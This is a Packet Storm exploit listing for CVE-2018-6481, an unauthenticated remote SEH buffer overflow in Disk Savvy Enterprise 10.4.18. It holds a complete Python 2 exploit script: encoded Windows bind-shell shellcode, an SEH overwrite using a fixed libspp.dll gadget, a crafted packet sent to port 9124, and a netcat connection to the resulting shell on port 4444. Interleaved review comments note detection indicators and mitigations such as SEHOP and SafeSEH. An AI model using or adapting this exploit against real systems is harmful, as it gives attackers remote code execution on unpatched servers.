
Disk Savvy Enterprise 10.4.18 Buffer Overflow

Date: 23 Feb 2018 00:00:00. Reported by: Daniel Teixeira. Type: packetstorm. Source: packetstormsecurity.com

Disk Savvy Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH) Exploit
21 Feb 201800:00
zdt
Circl
CVE-2018-6481
6 Feb 202503:13
circl
CNVD
Flexense Disk Savvy Enterprise Buffer Error Vulnerability
1 Mar 201800:00
cnvd
CVE
CVE-2018-6481
27 Feb 201819:00
cve
Cvelist
CVE-2018-6481
27 Feb 201819:00
cvelist
Exploit DB
Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH)
21 Feb 201800:00
exploitdb
exploitpack
Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH)
21 Feb 201800:00
exploitpack
Metasploit
Disk Savvy Enterprise v10.4.18
14 Feb 201820:35
metasploit
NVD
CVE-2018-6481
27 Feb 201819:29
nvd
Prion
Buffer overflow
27 Feb 201819:29
prion
`# Exploit Title: Disk Savvy Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH  
# Date: 01/02/2018  
# Exploit Author: Daniel Teixeira  
# Vendor Homepage: http://www.disksavvy.com/  
# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe  
# Version: 10.4.18  
# CVE: CVE-2018-6481  
# Tested on: Windows 7 x86  
  
  
from struct import pack  
from os import system  
from sys import exit  
from time import sleep  
import socket  
  
# Endpoint the crafted packet is sent to. 9124/TCP is the only service port this  
# script touches; 172.16.40.148 is a private (RFC 1918) address, presumably the  
# author's lab host.  
# NOTE(review): the advisory title describes the flaw as unauthenticated and  
# remote, so this port should not be reachable from untrusted networks.  
port = 9124  
host = "172.16.40.148"  
  
# Generated second-stage bytes. Per the command line below this is an x86 Windows  
# bind-shell payload, encoded so that none of the bytes listed after -b occur.  
# Detection note: later in this script the client connects to TCP 4444 on the  
# target, so an unexpected listener on 4444 on a host running the Disk Savvy  
# Enterprise server is the post-compromise indicator for this exact sample.  
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f py -b '\x00\x02\x0a\x0d\xf8\xfd' --var-name shellcode   
shellcode = ""  
shellcode += "\xba\x71\x6d\xbf\xc8\xd9\xc0\xd9\x74\x24\xf4\x5d"  
shellcode += "\x29\xc9\xb1\x53\x83\xed\xfc\x31\x55\x0e\x03\x24"  
shellcode += "\x63\x5d\x3d\x3a\x93\x23\xbe\xc2\x64\x44\x36\x27"  
shellcode += "\x55\x44\x2c\x2c\xc6\x74\x26\x60\xeb\xff\x6a\x90"  
shellcode += "\x78\x8d\xa2\x97\xc9\x38\x95\x96\xca\x11\xe5\xb9"  
shellcode += "\x48\x68\x3a\x19\x70\xa3\x4f\x58\xb5\xde\xa2\x08"  
shellcode += "\x6e\x94\x11\xbc\x1b\xe0\xa9\x37\x57\xe4\xa9\xa4"  
shellcode += "\x20\x07\x9b\x7b\x3a\x5e\x3b\x7a\xef\xea\x72\x64"  
shellcode += "\xec\xd7\xcd\x1f\xc6\xac\xcf\xc9\x16\x4c\x63\x34"  
shellcode += "\x97\xbf\x7d\x71\x10\x20\x08\x8b\x62\xdd\x0b\x48"  
shellcode += "\x18\x39\x99\x4a\xba\xca\x39\xb6\x3a\x1e\xdf\x3d"  
shellcode += "\x30\xeb\xab\x19\x55\xea\x78\x12\x61\x67\x7f\xf4"  
shellcode += "\xe3\x33\xa4\xd0\xa8\xe0\xc5\x41\x15\x46\xf9\x91"  
shellcode += "\xf6\x37\x5f\xda\x1b\x23\xd2\x81\x73\x80\xdf\x39"  
shellcode += "\x84\x8e\x68\x4a\xb6\x11\xc3\xc4\xfa\xda\xcd\x13"  
shellcode += "\xfc\xf0\xaa\x8b\x03\xfb\xca\x82\xc7\xaf\x9a\xbc"  
shellcode += "\xee\xcf\x70\x3c\x0e\x1a\xec\x34\xa9\xf5\x13\xb9"  
shellcode += "\x09\xa6\x93\x11\xe2\xac\x1b\x4e\x12\xcf\xf1\xe7"  
shellcode += "\xbb\x32\xfa\x16\x60\xba\x1c\x72\x88\xea\xb7\xea"  
shellcode += "\x6a\xc9\x0f\x8d\x95\x3b\x38\x39\xdd\x2d\xff\x46"  
shellcode += "\xde\x7b\x57\xd0\x55\x68\x63\xc1\x69\xa5\xc3\x96"  
shellcode += "\xfe\x33\x82\xd5\x9f\x44\x8f\x8d\x3c\xd6\x54\x4d"  
shellcode += "\x4a\xcb\xc2\x1a\x1b\x3d\x1b\xce\xb1\x64\xb5\xec"  
shellcode += "\x4b\xf0\xfe\xb4\x97\xc1\x01\x35\x55\x7d\x26\x25"  
shellcode += "\xa3\x7e\x62\x11\x7b\x29\x3c\xcf\x3d\x83\x8e\xb9"  
shellcode += "\x97\x78\x59\x2d\x61\xb3\x5a\x2b\x6e\x9e\x2c\xd3"  
shellcode += "\xdf\x77\x69\xec\xd0\x1f\x7d\x95\x0c\x80\x82\x4c"  
shellcode += "\x95\xb0\xc8\xcc\xbc\x58\x95\x85\xfc\x04\x26\x70"  
shellcode += "\xc2\x30\xa5\x70\xbb\xc6\xb5\xf1\xbe\x83\x71\xea"  
shellcode += "\xb2\x9c\x17\x0c\x60\x9c\x3d"  
  
# Message body: filler, the two 4-byte values that overwrite the SEH record, a  
# short stub, NOP padding, then the generated bytes, for a fixed total of 1000.  
# Root cause per the advisory title: the server copies an unauthenticated  
# request into a buffer without a length check.  
payload = "A" * 124 # offset (per the author: filler up to the overwritten SEH record)  
payload += "\x90\x09\xeb\x05" # jmp over seh return value  
# Mitigation note: the author's annotation on the next line records libspp.dll as  
# loaded with ASLR: False, Rebase: False and SafeSEH: False, which is what lets a  
# fixed handler address work. Defenders: system-wide SEHOP, and on the vendor  
# side linking with /SAFESEH and /DYNAMICBASE, target this technique; the real  
# fix is a patched release (no fixed version is named on this page).  
payload += "\x13\x6d\x05\x10" # 0x10056d13 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Disk Savvy Enterprise\bin\libspp.dll)  
  
  
  
payload += "\x90" * 10  
payload += "\x83\xc4\x64" * 20 # metasm > add esp,100  
payload += "\xff\xe4" # metasm > jmp esp  
# Pad with NOPs so that payload plus shellcode is exactly 1000 bytes long.  
payload += "\x90" * (1000 - len(payload) - len(shellcode))  
payload += shellcode  
  
# 24-byte message header placed in front of the body: three fixed 4-byte fields,  
# then the body length twice and the numeric value of the body's last byte, each  
# packed as a little-endian unsigned 32-bit integer ('<I').  
# NOTE(review): the meaning of the three fixed fields is not shown on this page;  
# presumably they are the service's normal message preamble, so they are not by  
# themselves a reliable network signature - confirm against legitimate traffic.  
# Python 2 only: str literals and pack() output are concatenated as byte strings.  
header = "\x75\x19\xba\xab"  
header += "\x03\x00\x00\x00"  
header += "\x00\x40\x00\x00"  
header += pack('<I', len(payload))  
header += pack('<I', len(payload))  
header += pack('<I', ord(payload[-1]))  
packet = header  
packet += payload   
  
# Network stage: open one TCP connection to host:port, send the packet once,  
# wait five seconds, then run the external nc client against port 4444.  
# NOTE(review): this listing lost its indentation in extraction - the bodies of  
# the try/except below sit at column 0, so the text is not valid Python as shown.  
# It is also Python 2 (print statements).  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
try:  
  
print "[*] Testing connection to tatget %s:%s" %(host,port)  
s.connect((host, port))  
  
# Bare except: any error is reported as a connection failure, not just socket errors.  
except:  
  
print "[-] Unable to communicate to target %s:%s" %(host,port)  
  
exit()  
  
# Single send() with no check of how many bytes were written; the socket is never closed.  
s.send(packet)  
  
print "[*] Payload Sent.."  
print "[*] Connecting to bind shell %s:4444 .." %host  
sleep(5)  
# Shell command string built from host; host is a hard-coded constant in this script.  
system("nc %s 4444"%host)  
  
`
